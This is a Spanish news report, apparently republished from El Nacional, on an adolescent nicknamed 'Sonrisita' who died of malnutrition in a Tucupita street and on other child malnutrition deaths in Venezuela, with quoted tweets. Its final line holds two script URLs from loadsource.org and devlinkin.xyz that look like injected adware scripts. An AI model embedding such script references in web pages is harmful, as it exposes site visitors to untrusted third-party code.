@MayVenezolana: “En Tucupita un niño cayó muerto cerca del miniterminal, desnutrido, lo identificaron personas del lugar como “sonrisita”. Demasiado egoísmo. Mucho ego. Huérfanos de solidaridad. No es saludable estar adaptado a una sociedad profundamente enferma de indiferencia”.

Lamentablemente las malas noticias son el pan diario para Venezuela, cada día que pasa la catástrofe humanitaria va dejando evidencia del abandono total, esta vez fue el hambre haciendo de las suyas y de la manera más cruel le arrebata la vida a un joven en situación de calle, en el Municipio Tucupita del Estado Delta Amacuro.

El adolescente quien según transeúntes de la zona le apodaban “Sonrisita”, falleció el día martes 31 de julio en plena calle, desvaneciéndose en la acera en las adyacencias del mini terminal de Tucupita y con notables signos de desnutrición por su delgado cuerpo.

¿Cómo iba a alimentarse y sobrevivir este joven, probablemente solitario, en un país donde ni para los adultos hay comida, medicinas, trabajo, efectivo? Son las imágenes del desastre humanitario. Pero ni todo el dolor que sufren los venezolanos produce la salida de Maduro.

La hambruna y las enfermedades como el sarampión son escenarios habituales en Tucupita, a mediados de marzo se supo del caso de un niño que mató a una paloma para poder comer junto a cuarenta niños más en un refugio, así lo dejó claro la periodista Heberlizeth González.

Como dato relevante de tal desidia gubernamental, El diputado a la Asamblea Nacional por el estado Monagas y secretario general de Primero Justicia (PJ) en esa entidad, José Antonio Mendoza, informó que en el hospital universitario doctor Manuel Tovar de Maturín, fallecieron en los últimos días cinco niños por desnutrición.

“Ya son cinco los niños que han muerto por desnutrición en este hospital y el número 34 del año, bajo la mirada indolente de una gobernadora que lo único que hace es montar shows partidistas. Hasta cuándo vamos a ver como nuestra gente se nos muere y no hacemos nada”, comentó el parlamentario en una protesta a las afueras del recinto médico.

En @ReporteYa seleccionamos algunas opiniones de nuestros destacados seguidores:

Nuestra seguidora, @MayVenezolana redacta: “En Tucupita un niño cayó muerto cerca del miniterminal, desnutrido, lo identificaron personas del lugar como “sonrisita”. Demasiado egoísmo. Mucho ego. Huérfanos de solidaridad. No es saludable estar adaptado a una sociedad profundamente enferma de indiferencia”.

La usuaria, Caicareña2 @Caicarea21 expresa: “un niño llamado sonrisas muere en la calle desnutrido SOS a la indiferencia”.

Nuestra seguidora, Anay @Anay65 señala: “Inhumanamente brutal. Que hacen esas personas mirándolo, lo hubiesen ayudado antes, que desgracia tan grande”.

La cuenta, Anonynews VenezuelaLibre @Anonynews111 comunica: “otro Niño muere de hambre en Tucupita Delta Amacuro mientras Venezuela muere de hambre la oligarquía socialista cada día mas gordos y se pasean en Toyotas 2018 y avionetas privadas”.

El Locutor, Visión Pública @FARFAN_UNO comenta: “Delta Amacuro #01Ago En Tucupita un niño se desplomó sin signos vitales cerca del mini terminal, tenía característica de desnutrición y muy enflaquecido, lo identificaron personas del lugar como “sonrisita”.

Nuestro seguidor, M Milesascovich @Mscovich opina: “Este adolescente, casi un niño, murió hoy en Tucupita, en la calle, desnutrido, hambriento y así como él hay miles”.

La usuaria, María C. Bello @bellomc escribe: “Dios que tragedia, increíble como nos hemos vuelto tan indiferentes e indolentes”.

VÍA EL NACIONAL.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533261811847https://devlinkin.xyz/addons/lnkr5.min.js

Loading...